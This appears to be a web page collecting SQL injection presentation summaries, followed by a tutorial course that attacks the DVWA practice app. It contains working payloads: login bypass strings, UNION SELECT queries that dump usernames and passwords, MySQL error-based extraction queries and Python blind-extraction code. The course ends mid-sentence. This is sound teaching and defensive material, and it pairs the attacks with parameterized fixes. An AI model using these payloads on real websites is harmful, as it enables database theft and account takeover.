A full course on what SQL injection is, how it affects us, how we can protect our website from it, and some real scenarios where I discuss the 3 main methods: union based, where we get all the information with only one query; error based, where we use known errors from MySQL to obtain the information from the database; and blind based, where we make the server respond to queries as true or false and verify the results. I also cover conclusions and protection methods, and I added a bibliography of what I read plus some more information from my personal knowledge.
PS: The images look better when the presentation is downloaded to your hard drive!
XSS and SQL injection are the top two injection attacks currently threatening web applications.
Cross-site scripting (XSS) is a code injection attack that allows a malicious user to execute malicious JavaScript in another user's browser. A successful XSS attack compromises the security of both the web application and its users.
SQL injection is a technique where a malicious user injects SQL commands into an SQL statement via web page input. The injected SQL commands alter the statement and compromise the security of the web application.
The document discusses SQL injection attacks, including what SQL injection is, types of SQL injection attacks such as first and second order attacks, mechanisms for injection through user input or cookies, and techniques for preventing SQL injection like defensive coding practices and input validation. SQL injection is a code injection technique where malicious SQL statements are inserted into an entry field for execution by the backend database, allowing attackers to view or manipulate restricted data in the database. The document provides examples of SQL injection and explores ways attackers can infer information and encode attacks despite prevention methods.
This document discusses SQL injection and the sqlmap tool for automating the process of detecting and exploiting SQL injection flaws. Some key points:
- SQL is the query language used to manage data in relational database management systems. SQL injection occurs when malicious SQL code is inserted into an entry field for execution, potentially enabling control of the entire database.
- Sqlmap automates the process of detecting and exploiting SQL injection vulnerabilities. It has capabilities like database fingerprinting, data extraction, accessing the underlying file system, and executing commands on the operating system via SQL injection.
- The tool can detect injectable parameters, generate payloads automatically to retrieve data, fingerprint the database management system, and provide an interactive SQL shell.
SQL injection is a type of attack where malicious SQL code is injected into an application's database query, potentially exposing or modifying private data. Attackers can bypass logins, access secret data, modify website contents, or shut down databases. SQL injection occurs when user input is not sanitized before being used in SQL queries. Attackers first find vulnerable websites, then use the errors produced by ORDER BY or UNION SELECT with the wrong column count to determine how many columns the query returns. They use "UNION SELECT" statements to discover which columns are reflected in the page, allowing them to extract data like user credentials or database contents. Developers should validate all user input and, above all, use parameterized queries so that input is never parsed as SQL.
This document discusses SQL injection, which is a security vulnerability that allows attackers to interfere with how a database operates. SQL injection occurs when user input is not sanitized and is used directly in SQL queries, allowing attackers to alter the structure and meaning of queries. The document provides an example of how an attacker could log in without a password by adding SQL code to the username field. It also lists some common SQL injection techniques like using comments, concatenation, and wildcards. Finally, it points to additional online resources for learning more about SQL injection and database security.
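The login bypass and the UNION-based column enumeration described in the two summaries above, as an added example that is not part of any of the presentations listed on this page. It uses Python's standard sqlite3 module in place of MySQL (the ORDER BY and UNION SELECT behaviour is the same), and the users and products tables are constructed sample data:

```python
import sqlite3


def build_db():
    """Constructed sample data (assumption): a storefront with a users table
    and a products table, the usual targets of the walkthrough above."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'bob', 'hunter2');
        CREATE TABLE products(id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.99);
    """)
    return db


# --- vulnerable code: user input is pasted into the statement text ----------

def vulnerable_login(db, username, password):
    sql = (f"SELECT id FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return db.execute(sql).fetchone() is not None


def vulnerable_product(db, product_id):
    sql = f"SELECT name, price FROM products WHERE id = {product_id}"
    return db.execute(sql).fetchall()


# --- hardened code: bound parameters, so input is never parsed as SQL -------

def safe_login(db, username, password):
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None


def safe_product(db, product_id):
    sql = "SELECT name, price FROM products WHERE id = ?"
    return db.execute(sql, (product_id,)).fetchall()


# --- attacker side ------------------------------------------------------------

# Closes the string literal and comments out the password check.
LOGIN_BYPASS = "admin' --"


def find_column_count(db, max_cols=10):
    """ORDER BY n succeeds while n <= number of selected columns and raises
    an error once it exceeds them; the last good n is the column count."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_product(db, f"1 ORDER BY {n}")
        except sqlite3.OperationalError:
            return n - 1
    return None


def dump_credentials(db):
    """UNION SELECT the users table into the product listing. The select list
    is padded with NULLs so it matches the column count found above."""
    cols = find_column_count(db)
    select_list = ", ".join(["username || ':' || password"] + ["NULL"] * (cols - 1))
    payload = f"0 UNION SELECT {select_list} FROM users --"
    return sorted(row[0] for row in vulnerable_product(db, payload))


if __name__ == "__main__":
    db = build_db()
    print("bypass against vulnerable_login:", vulnerable_login(db, LOGIN_BYPASS, ""))
    print("bypass against safe_login:", safe_login(db, LOGIN_BYPASS, ""))
    print("columns in product query:", find_column_count(db))
    print("dumped credentials:", dump_credentials(db))
```

The attacker-side functions only need the application to reflect one column of the query result and to fail when ORDER BY goes out of range. Against the parameterized versions the same payloads return nothing, because the bound value is compared as data instead of being parsed as SQL.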
This document provides a tutorial on SQL injection, including:
- Explaining what SQL injection is and how it works by exploiting vulnerabilities in database queries
- Steps to test for SQL injection vulnerabilities like determining the database type and getting environment information
- Methods for extracting data through SQL injection like getting database, table, and column names and record data
- Recommending the use of automated SQL injection scanning tools like WebCruiser to more efficiently test for and exploit SQL injection vulnerabilities
- Instructions for setting up sample PHP/MySQL and ASP/SQL Server testing environments to practice SQL injection techniques
• What is SQL injection ?
• Why is it harmful?
• Types of SQL injection attacks.
• How to identify SQL injection vulnerability.
• Exploiting SQL injection.
• How to protect Web Application from SQL injection.
This document discusses SQL injection and techniques to prevent it. SQL injection occurs when malicious SQL statements are inserted into an entry field to exploit vulnerabilities in the underlying database. Attackers can use SQL injection to bypass login screens or retrieve sensitive data. To prevent SQL injection, developers should escape special characters in user input before submitting queries, use prepared statements with bound parameters, and validate and sanitize all input. Input escaping involves using database-specific escape functions like mysql_real_escape_string() to avoid unintended SQL commands. Note that mysql_real_escape_string() belongs to the old mysql extension, which was removed in PHP 7 (mysqli_real_escape_string() and PDO are the replacements), and that escaping only protects quoted string literals: a value concatenated into a numeric context such as WHERE id = $id is not protected at all, which is why prepared statements with bound parameters are the primary defence and escaping is at best a fallback.
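The escaping caveat above, as an added example that is not from the summarized document: the same escape function that closes the hole in a quoted string context does nothing for an unquoted numeric one, while a bound parameter covers both. Python's sqlite3 module stands in for MySQL, escape_sql_string() is a hypothetical stand-in for mysql_real_escape_string(), and the accounts table is constructed sample data:

```python
import sqlite3


def build_db():
    """Constructed sample data (assumption): an accounts table looked up both
    by owner name (quoted context) and by numeric id (unquoted context)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE accounts(id INTEGER, owner TEXT, balance INTEGER);
        INSERT INTO accounts VALUES (1, 'alice', 100), (2, 'bob', 250), (3, 'carol', 75);
    """)
    return db


def escape_sql_string(value):
    """Hypothetical stand-in for mysql_real_escape_string(): doubles single
    quotes, which is the complete escape for SQLite string literals (SQLite
    has no backslash escapes; MySQL's function also handles those)."""
    return str(value).replace("'", "''")


def balance_by_owner_escaped(db, owner):
    """Quoted string context: escaping keeps the attacker inside the literal."""
    sql = f"SELECT balance FROM accounts WHERE owner = '{escape_sql_string(owner)}'"
    return [row[0] for row in db.execute(sql)]


def balance_by_id_escaped(db, account_id):
    """Unquoted numeric context: there is no quote to escape, so the same
    escape function lets an 'OR 1=1' tautology straight through."""
    sql = f"SELECT balance FROM accounts WHERE id = {escape_sql_string(account_id)}"
    return [row[0] for row in db.execute(sql)]


def balance_by_id_bound(db, account_id):
    """Bound parameter: the value is never parsed as SQL, whatever the context."""
    sql = "SELECT balance FROM accounts WHERE id = ?"
    return [row[0] for row in db.execute(sql, (account_id,))]


if __name__ == "__main__":
    db = build_db()
    print("escaped, quoted:  ", balance_by_owner_escaped(db, "alice' OR '1'='1"))
    print("escaped, unquoted:", balance_by_id_escaped(db, "1 OR 1=1"))
    print("bound, unquoted:  ", balance_by_id_bound(db, "1 OR 1=1"))
```

The escaped numeric lookup returns every account because nothing in "1 OR 1=1" needed escaping; the bound version returns nothing because the whole string is compared against the integer column as a single value.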
This document discusses SQL injection attacks and how to prevent them. It describes different types of SQL injection like blind SQL injection and union-based injection. It provides examples of vulnerable code and how attackers can exploit it. Finally, it recommends best practices for prevention, including using parameterized queries, stored procedures, input validation, and secure configuration.
SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. This is a method of attacking web applications that have a data repository. The attacker sends a specially crafted SQL statement that is designed to cause some malicious action. SQL injection is an attack technique that exploits a security vulnerability occurring in the database layer of an application or service. It is most often found within web pages with dynamic content.
The document discusses SQL injection, including its types, methodology, attack queries, and prevention. SQL injection is a code injection technique where a hacker manipulates SQL commands to access a database and sensitive information. It can result in identity spoofing, modifying data, gaining administrative privileges, denial of service attacks, and more. The document outlines the steps of a SQL injection attack and types of queries used. Prevention methods include minimizing privileges, coding standards, and firewalls.
The slide consists of:
An explanation for SQL injections.
First order and second order SQL injections.
Methods: Normal and Blind SQL injections with examples.
Examples: Injection using true/false, drop table and update table commands.
Prevention using dynamic embedded SQL queries.
Conclusion and References.
This document provides an introduction to SQL injection basics. It defines SQL injection as executing a SQL query or statement by injecting it into a user input field. The document outlines why SQL injection is studied, provides a sample database structure, and describes generic SQL queries and operators like UNION and ORDER BY. It also categorizes different types of SQL injection and attacks. The remainder of the document previews upcoming topics on blind SQL injection, data extraction techniques, and prevention.
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers..., by Edureka!
(** Cyber Security Course: https://www.edureka.co/cybersecurity-certification-training **)
This ‘SQL Injection Attack’ PPT by Edureka will help you learn about one of the most dangerous web application vulnerabilities, SQL injection.
Below is the list of topics covered in this session:
Web Application Security
What is SQL Injection Attack?
Types of SQL Injection attacks
Demo – SQL Injection Attack Types
Prevention of SQL Injection Attack
This presentation was given at the November 2012 chapter meeting of the Memphis ISSA. In the presentation, I discuss various methods of exploiting common SQL Injection vulnerabilities, as well as present a specialized technique known as Time-Based Blind SQL Injection. Related to the latter, I give a scenario in which other common forms of SQL Injection would fail to produce results for a penetration tester or attacker, and show how one may overcome this situation by using the specialized technique. The scenario given, along with the sample code, is NOT a contrived example, but instead is closely based on a real-world application that I encountered as part of an assessment.
A live demonstration of the common forms of SQL Injection was also given which utilized the OWASP Broken Web Apps VM, DVWA, Burp Proxy and SQL Power Injector. To demo a real-world time-based blind injection, I created and locally hosted a new application which closely mimicked the real-world application mentioned above.
This document discusses SQL injection, including what it is, different types, and how to exploit it. It begins with an introduction to SQL injection, describing error-based, time-based, and boolean-based SQLi. It then covers exploiting SQLi to compromise databases by uploading shells and using SQLmap. The remainder demonstrates SQLi techniques like union queries, extracting data, and bypassing filters. Tools, methodology, and resources for further learning are also mentioned.
This document provides examples of different techniques for performing SQL injection, including error-based, union-based, and blind SQL injection. It demonstrates how to use each technique to extract information like the database user from Microsoft SQL Server. Error-based SQL injection involves causing errors and analyzing the error messages. Union-based SQL injection uses the SQL UNION operator to combine result sets. Blind SQL injection uses time delays or other inferences to determine information without direct errors or results.
SQL injection is a dangerous vulnerability: attacker-supplied input transforms a normal SQL query into a malicious one. A successful SQL injection attack can lead to unauthorized access, changed or deleted data, and theft of information. Do not take SQL injection for granted.
SQL injection is a code injection technique where malicious SQL statements are inserted into an entry field for execution, allowing a hacker to interfere with a database-driven application's interaction with backend databases. There are different types of SQL injections, including union-based, error-based, and blind SQL injections. Authentication can also be bypassed through SQL injection by making logical conditions like 1=1 or ""="" always true. The document provides examples of SQL injection payloads and demo websites to practice SQL injection techniques.
This document discusses SQL injection (SQLI), which is a code injection technique used to attack data-driven applications. SQLI works by inserting malicious SQL statements into entry fields for execution on the backend database. This allows attackers to read sensitive data, modify database contents, and perform administration tasks. The document outlines common SQLI attack methods like error-based and union-based techniques. It also categorizes SQLI attacks as in-band, inferential/blind, or out-of-band based on how results are returned. Examples are provided to illustrate how SQLI exploits vulnerabilities in dynamic SQL queries.
SQL injection is a type of security exploit in which the attacker adds SQL statements through a web application's input fields or hidden parameters to gain access to resources or make changes to data.
What they are, steps you can take to prevent them, a brief overview.
3/13/2013 winter term 2013 at Portland State University for the Introduction to Databases class.
Presented by Stacy Watts and Tyler Fetters
This document discusses SQL injection vulnerabilities and techniques. It describes blind SQL injection as an attack where the attacker asks the database true-or-false questions and infers information from the application's responses. Error-based SQL injection uses the errors returned by the server to extract data, whereas blind SQL injection must infer the answer from behaviour alone, for example through the delay introduced by MySQL's SLEEP() function. The document provides examples of SQL injection attacks and commands. It recommends preventing SQL injection by sanitizing user input with functions like mysqli_real_escape_string() before building queries; since escaping only protects quoted string literals, prepared statements with bound parameters are the stronger, context-independent defence.
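A boolean-based blind extraction of the kind described above, as an added example that is not from the summarized document. SQLite has no SLEEP(), so the oracle here is the true/false behaviour of a page rather than a time delay; with a time-based oracle the same search loop applies, with the answer read from the response latency instead of the response body. The tables are constructed sample data and the endpoint names are assumptions:

```python
import sqlite3


def build_db():
    """Constructed sample data (assumption): an articles table the page looks
    up by id and a users table the attacker wants to read."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles(id INTEGER, title TEXT);
        INSERT INTO articles VALUES (1, 'Hello world');
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'Pa55'), (2, 'guest', 'guest');
    """)
    return db


def article_exists(db, article_id):
    """Vulnerable endpoint (assumed name): concatenates the id, swallows
    database errors, and reveals only whether a row came back. That single
    bit is the oracle a blind injection needs."""
    sql = f"SELECT id FROM articles WHERE id = {article_id}"
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.OperationalError:
        return False


def safe_article_exists(db, article_id):
    """Hardened endpoint: the id is bound, so no condition is ever parsed."""
    sql = "SELECT id FROM articles WHERE id = ?"
    return db.execute(sql, (article_id,)).fetchone() is not None


def ask(db, condition):
    """Ask the oracle a yes/no question by ANDing it onto a known-true lookup."""
    return article_exists(db, f"1 AND ({condition})")


def extract_password(db, username, max_len=32):
    """Recover users.password for `username` one answer at a time: learn the
    length, then binary-search each character's code point over printable
    ASCII (about 7 questions per character instead of up to 95).
    Returns (password, number_of_questions)."""
    target = f"(SELECT password FROM users WHERE username = '{username}')"
    length = None
    for n in range(1, max_len + 1):
        if ask(db, f"length({target}) = {n}"):
            length = n
            break
    if length is None:
        return None, 0
    queries = length
    recovered = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126            # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            queries += 1
            if ask(db, f"unicode(substr({target}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered.append(chr(lo))
    return "".join(recovered), queries


if __name__ == "__main__":
    db = build_db()
    password, queries = extract_password(db, "admin")
    print(f"recovered {password!r} with {queries} true/false questions")
    print("same condition against the bound query:",
          safe_article_exists(db, "1 AND (1=1)"))
```

The binary search is what makes blind extraction practical: each character costs a handful of requests rather than one per candidate, and the same loop drives a time-based oracle once ask() is rewritten to measure latency.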
Sql injection bypassing hand book blackrose, by Noaman Aziz
In this book I am not gonna teach you the basics of SQL injection; I will assume that you already know them, because c'mon, everyone talks about it, and you will find tons and tons of posts on forums related to the basics of SQL injection. In this post I will talk about common methods used by hackers and pentesters for evading IDS, IPS and WAFs such as ModSecurity, dotDefender etc.
SQL injection is a code injection technique where malicious SQL statements are inserted into an entry field for execution (usually to gain access to a database). It works by exploiting applications that concatenate SQL statements and user input without validation or encoding. The document discusses types of SQL injection like error-based, union-based, and blind SQL injection. It also provides examples of SQL injection and recommendations to avoid it like using prepared statements with bound variables and checking/sanitizing all user input.
SQL injection is a web security vulnerability that allows attackers to interfere with or gain access to a database through a web application. It occurs when user input is not validated for SQL keywords and special characters that could modify the intended SQL queries. Attackers can use SQL injection to read sensitive data from the database, modify database contents, or even execute administrative operations. Input validation helps, and parameterized queries are the primary defence; output encoding, which the document also recommends, addresses XSS rather than SQL injection.
Web Security - OWASP - SQL injection & Cross Site Scripting XSS, by Ivan Ortega
XSS vulnerabilities allow attackers to inject malicious scripts into web pages viewed by other users. There are three main types: stored XSS injects scripts into stored data like forums; reflected XSS uses malicious links; DOM-based XSS modifies the DOM. Successful XSS can steal users' cookies and passwords, hijack sessions, deface websites, and distribute malware. Developers can prevent XSS by escaping untrusted data, using safe templating systems, and implementing a content security policy.
The document discusses SQL injection in Oracle-based applications. It begins by defining SQL injection and explaining how it works by manipulating user-supplied data to alter SQL statements. It then provides examples of how SQL can be injected into Oracle to extract data, enumerate privileges, and abuse stored procedures. The document concludes by discussing ways to prevent SQL injection, such as avoiding dynamic SQL, using bind variables, and following the principle of least privilege.
This document discusses SQL injection attacks and proposes a parser to prevent them. It begins with an introduction that describes the architecture of web applications and databases, and how SQL injection exploits vulnerabilities in this architecture. It then provides an overview of SQL injection attacks, explaining how malicious SQL commands can be inserted to trick applications into executing unintended queries. The document proposes a parser that determines if queries are functionally equivalent to prevent SQL injection. It was tested on a sample application and results were positive. In the next sections, the document discusses the working of SQL injections in more detail and categorizes different types of SQL injection attacks.
SQL injection is a code injection technique used to attack data-driven applications that use SQL queries to access a backend database. An attacker can insert malicious SQL statements into the login form of a web application to gain unauthorized access to the database. The document discusses what SQL injection is, types of SQL injection like in-band and out-of-band, and provides examples. It also notes that SQL injection is a serious problem that can allow attackers to delete, modify or steal data. Suggested solutions include input validation, prepared statements, and minimizing database privileges.
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE, by Ajith Kp
Contents
1. Introduction
1.1 Database
1.2 SQL
1.3 Simple queries of SQL
1.4 What are SQL injections?
1.5 What can cause those injections?
1.6 How can SQL injection affect the system administrators (root)?
1.7 How can SQL injection affect the website administrator?
1.8 How can SQL injection affect the website users?
1.9 How can SQL injection affect the web page visitors?
1.10 How can we do SQL injection?
2. Classification
2.1 Union based
2.2 Error based
2.3 Blind based
3. Possible scenario
3.1 Types of SQL queries
3.2 Union based
3.3 Error based
3.4 Blind based
4. Methods of protection
5. Conclusions
Bibliography
1. Introduction
In the last year this type of vulnerability has become more frequent on websites. First we need to know what this vulnerability is, how it is exploited and how to protect against it.
1.1 Database
A database is a collection of data. From the perspective of a website, the database is used to store different information such as usernames, passwords, web pages, information about the website and much more.
Examples of databases (DB servers): MySQL, MSSQL, Oracle, PostgreSQL, SQLite.
1.2 SQL
SQL stands for Structured Query Language. If we want to communicate with the database we use SQL queries.
1.3 Simple queries of SQL
SELECT * FROM table_name;
This statement outputs all the rows of the table, together with the names of the columns.
Ex:
SELECT * FROM users;
INSERT INTO users(username, password) VALUES("user", "pass");
We use it to insert the values user and pass into the table users, in the columns username and password.
1.4 What are SQL injections?
SQL injection is a technique of injecting malicious SQL code through a web application. In the following labs I will show different types of possible attacks on a website. These sequences of malicious SQL code are inserted into a field, sent either by GET or by POST, and then executed by the server itself.
1.5 What can cause those injections?
Through this method an unauthorized person obtains access to the database of the website; thus the attacker gets access to all the detailed information in the database.
1.6 How can SQL injection affect the system administrators (root)?
Usually one error leads to another, and so on, until an attacker manages to enter the server; from there things change drastically: once a malicious file is uploaded to the server, the attacker can control the website as well as the server.
1.7 How can SQL injection affect the website administrator?
The website administrator can lose access to the admin panel: the attacker can change the password and modify the e-mail address in the database so that the admin panel or the website can no longer be recovered.
1.8 How can SQL injection affect the website users?
This is the worst part, because once the website has been taken over, its users receive from the "administrator" a notification telling them to visit an unknown page that carries malicious code disguised as something else, so the users get infected too.
1.9 How can SQL injection affect the web page visitors?
Let us assume the server has already been compromised and the attacker modifies the structure of the web page; once a visitor opens the website, the attacker can steal their cookies, infect other people, etc.
1.10 How can we do SQL injection?
We have the automated method, with programs like sqlmap, mole, havij etc. These are not very efficient because they only use predefined queries, so if the injection is complicated the tool will not know what to do and will quit, reporting that the site is not vulnerable when in fact it is. The second method is manual injection, which we will discuss in this laboratory, along with other possible types of attacks on a website in the following laboratories.
2. Classification
To date, 3 main methods of SQL injection have been discovered, and those are:
2.1 Union based
With this method we find the number of columns the current table has and, by applying the following command, we obtain certain "errors" that we can exploit in our favour:
union select 1,2,3,4,5,...(the number of columns that the current table has)
We can obtain information such as the PHP version, the user with which the SQL queries are made (often [person/website name]@localhost), the database name, the system user, permissions on the server, as well as any information from the database.
The commands for a custom union based query (everything we discuss here is done manually) I will show in the next section, in which I will demonstrate a possible attack on a server (in our case the internal server).
2.2 Error based
It is the second method of SQLi (SQL injection). Unlike union based, with this method we can output only a single piece of information at a time, through a SQL error. The commands used in error based injection are quite complex, so we cannot memorise them by heart.
What I want you to remember is that union based and error based commands output the same information; the difference is that one is quicker than the other.
2.3 Blind based
The last technique in the SQLi series "outputs" the information more slowly than the first two, because the number of queries can grow significantly with the amount of information in the database.
The queries resemble a game of true or false: if the query is true the server outputs the website normally, and if it is false the server outputs only parts of the website.
I will give examples for each type in the next section, the possible scenario, where I will explain in detail every step taken to reach the wanted information from the database.
3. Possible scenario
In this scenario I will use the Damn Vulnerable Web App (DVWA), which is written in PHP. This tool was created for teachers, students and anyone who wants to learn more about application security in a classroom environment. I will use it to prove the concept of SQL injection.
First of all, when we start an injection of any of the 3 types, we need to close the query so that the sequence that follows executes the way we want!
If we want to see the executed query in real time we can add the following PHP code, which appends the query to the page output:
$html .= '<pre>' . $getid . '</pre>';
3.1 Types of SQL queries
3.1.1 String based
Suppose that we have the following sequence:
$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
To execute commands we need to close the sequence correctly so that our code gets executed! How do we do that? We try something simple: ' (a single quote).
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
What does this mean? It means that we have a MySQL database. And why do we get that error? Let us understand better!
select first_name, last_name from users where user_id=''';
At the end of the sequence we put --+ (-- starts a comment, and the + stands for a space, which the string based type needs).
(!!! It will also work with --+- or -- -.)
select first_name, last_name from users where user_id=''-- ';
When we find that id=1'--+ works correctly, we can continue the injection.
3.1.2 Integer based
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
We try, like last time, ' (a single quote).
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
If we put id=1'--+ we get the following error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''--' at line 1
This means we cannot use string based! What happens when we take out the '? With id=1--+ or even id=1-- we see that the sequence executes correctly and the page shows no errors or missing text.
select first_name, last_name from users where user_id=1--;
3.1.3 Multiple types
The query could differ from the first 2 types presented before.
This means that it could be closed even with "--, ')--, )--, ))--, ")--, ")--, '))-- etc.
So the query can take multiple forms; the main idea is that only one will work!
Some examples of SQL queries:
select * from table_name where id=1
select * from table_name where id='1'
select * from table_name where id="1"
select * from table_name where id=(1)
select * from table_name where id=('1')
select * from table_name where id=("1")
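As an added example (not code from the course or from DVWA), the string based and integer based forms of the users query above, rebuilt in Python on an in-memory SQLite table that stands in for DVWA's users table, next to a version that binds the input as a parameter. The sample rows are constructed; SQLite replaces MySQL so the example runs offline, and the union select case from the next section is included to show how a closed query can be extended.

```python
import sqlite3

# Constructed sample rows standing in for DVWA's users table (example data, not DVWA's own).
USERS = [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")]


def _connect():
    """Fresh in-memory SQLite table with the three columns the course's query touches.
    SQLite is used instead of MySQL so the example runs offline; '--' starts a comment in both,
    only the wording of the syntax error differs."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def vulnerable_lookup(id_param, string_based=True):
    """Builds the query the way DVWA's $getid does: the raw ?id= value is pasted into the SQL text.

    string_based=True  -> WHERE user_id = '$id'   (section 3.1.1)
    string_based=False -> WHERE user_id = $id     (section 3.1.2)
    Returns (rows, error): error is None when the text parsed and ran, otherwise the
    database's syntax error, i.e. the signal the course reads to pick the closing sequence.
    """
    if string_based:
        sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{id_param}'"
    else:
        sql = f"SELECT first_name, last_name FROM users WHERE user_id = {id_param}"
    conn = _connect()
    try:
        return conn.execute(sql).fetchall(), None
    except sqlite3.OperationalError as exc:
        return [], str(exc)
    finally:
        conn.close()


def safe_lookup(id_param):
    """Hardened form: the value is bound as a parameter, so the driver never treats it as SQL.
    A quote, a comment marker or a UNION inside id_param stays part of the compared value."""
    conn = _connect()
    try:
        return conn.execute(
            "SELECT first_name, last_name FROM users WHERE user_id = ?", (id_param,)
        ).fetchall()
    finally:
        conn.close()


if __name__ == "__main__":
    # The same inputs the course tries, without the '+' (which is only URL encoding for a space).
    for raw in ("1", "1'", "1'--", "1--", "0' union select 1,2--"):
        print("string  :", repr(raw), vulnerable_lookup(raw))
        print("integer :", repr(raw), vulnerable_lookup(raw, string_based=False))
        print("bound   :", repr(raw), safe_lookup(raw))
```

The pairing reproduces the course's observations: 1'-- closes the string based query but breaks the integer based one, 1-- does the reverse, and the bound query returns nothing for any of the probes because the whole input is compared as a value.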
3.2 Union based
The following methods are examples for string based and integer based only.
As the name says, this type of injection uses the SQL UNION command, which combines the results of two or more SELECT statements, as in the following example:
SELECT column_name(s) FROM table1
UNION
SELECT column_name(s) FROM table2;
We check the functionality of ORDER BY. How does ORDER BY work?
It is used to sort the results obtained through SELECT.
SELECT column_name, column_name
FROM table_name
ORDER BY column_name ASC|DESC, column_name ASC|DESC;
order by 1 (if it works we try 2, 3, ..., N, where N is the number of columns of the current table).
Let us assume we reach 2 (order by 2).
I tried 2 and it worked; if I try order by 3 we get an error.
Unknown column '3' in 'order clause'
Why do we get an error with order by 3? The table we are using has only 2 columns that are used in the query.
Now we must use union select to inject the commands through which we find the information in the database.
union select 1,2
Why do we write 1,2 instead of 1,2,3,4? As I said before, in our table only 2 columns are used by the query:
SELECT first_name, last_name FROM users
We already know the table, but we assume that we do not.
We obtain 1 and 2 on the page – those are the vulnerable columns.
(!!! If nothing is output and we get no errors, we set the parameter to a number that does not exist in the database, or we negate the condition.)
For example:
id=1' and 0 union select 1,2--+
id=1' and 1=0 union select 1,2--+
id=-1' union select 1,2--+
id=0' union select 1,2--+
id=99999' union select 1,2--+
We modify one of the vulnerable columns shown on the page to check the version of the running MySQL server. The purpose is to identify the version of the DBMS so we can search for known vulnerabilities of that version.
union select 1,version()
We get 5.6.24. This is the version in my example; on each server it depends on the MySQL server that is running. On CSIRT there are known/declared/registered vulnerabilities for every version of the MySQL DBMS. Those can later be exploited with the help of other attack techniques/instruments.
We check the name of the database. The purpose is to get the current database in which the application runs.
union select 1,database()
We get the name of the database: dvwa.
Next we obtain all the tables of the database, with the purpose of identifying a table that may hold an administrator account. We use the following SQL pieces to obtain all tables from the current database:
group_concat(table_name) – which we put in place of database()
from information_schema.tables where table_schema=database() – which we add at the end of the SQL command:
union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
How do the previous commands work?
group_concat() is a function that returns a string by concatenating the non-null values of a group. information_schema.tables holds the list of all tables existing in the databases on the server. table_schema is the part we set to a database name in order to get information only from that database.
We obtain guestbook and users. To extract information from users we need to modify the command: we replace table_name with column_name and at the end we write
from information_schema.columns where table_name = 0x7573657273
where 0x7573657273 is users transformed into hexadecimal format; for efficiency we use the Hackbar add-on for Firefox. We could have used users directly, but we are not sure whether the current SQL user can write or read the restricted files of the server.
We find user_id, first_name, last_name, user, password, avatar, USER, CURRENT_CONNECTIONS, TOTAL_CONNECTIONS.
To output the information from the columns user and password we have the following command:
union select 1, group_concat(0x3c62723e,user,0x3a3a,password) from users
where 0x3c62723e is <br> in HTML. We receive the wanted information from the 2 columns (user and password) of the table users.
Let us assume we have an admin table with the columns username and password. The command will look like this:
union select 1,group_concat(username,0x0a,password),3 from admin
Executing the query we will receive the admin account and the password!
If we look closely, we will see that the password is a hash, maybe MD5 or SHA-1, i.e. a one-way hash. What does this mean? A password, once hashed, cannot be decrypted; this makes it hard to break, so we can try a dictionary attack, rainbow tables and/or even a brute-force attack.
3.3 Error based
In this method, as I said before, we can output one piece of information at a time!
This means:
and(select 1 from(select count(*),concat((select (select concat(version(),0x00)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as x from information_schema.tables group by x)a)
Duplicate entry '5.6.24' for key 'group_key'
If we wish to output the name of the database, we replace version() with database().
and(select 1 from(select count(*),concat((select (select concat(database(),0x00)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as x from information_schema.tables group by x)a)
If we want to reach the tables, we must change the query a little.
and(select 1 from(select count(*),concat((select (select (select concat(table_name,0x00) from information_schema.tables where table_schema=database() limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Duplicate entry '~guestbook' for key 'group_key'
To get to the next table we increment the limit.
(!!! If the query works for limit 5,1 but not for limit 6,1, this means there are only 6 tables in that database. The same rule works for determining the number of columns or the number of records in a table.)
and(select 1 from(select count(*),concat((select (select (select concat(table_name,0x00) from information_schema.tables where table_schema=database() limit 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
When we try limit 2,1 we receive a valid web page without any errors. Because we extract the information from the database through SQL errors, this tells us that there are only 2 tables in the database named dvwa!
We can see which columns are inside the table named users with the next query:
and(select 1 from(select count(*),concat((select (select (select concat(column_name,0x00) from information_schema.columns where table_name=0x7573657273 and table_schema=database() limit 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)
Where 0x7573657273 = users
We continue to increment the limit of the columns to search for user and password, the same as in union based:
limit 1,1
limit 2,1
And so on, depending on how many columns we want to get...
and(select 1 from(select count(*),concat((select (select (select concat(column_name,0x00) from information_schema.columns where table_name=0x7573657273 and table_schema=database() limit 3,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)
The query to obtain the first record from the table users, using the columns user and password, is:
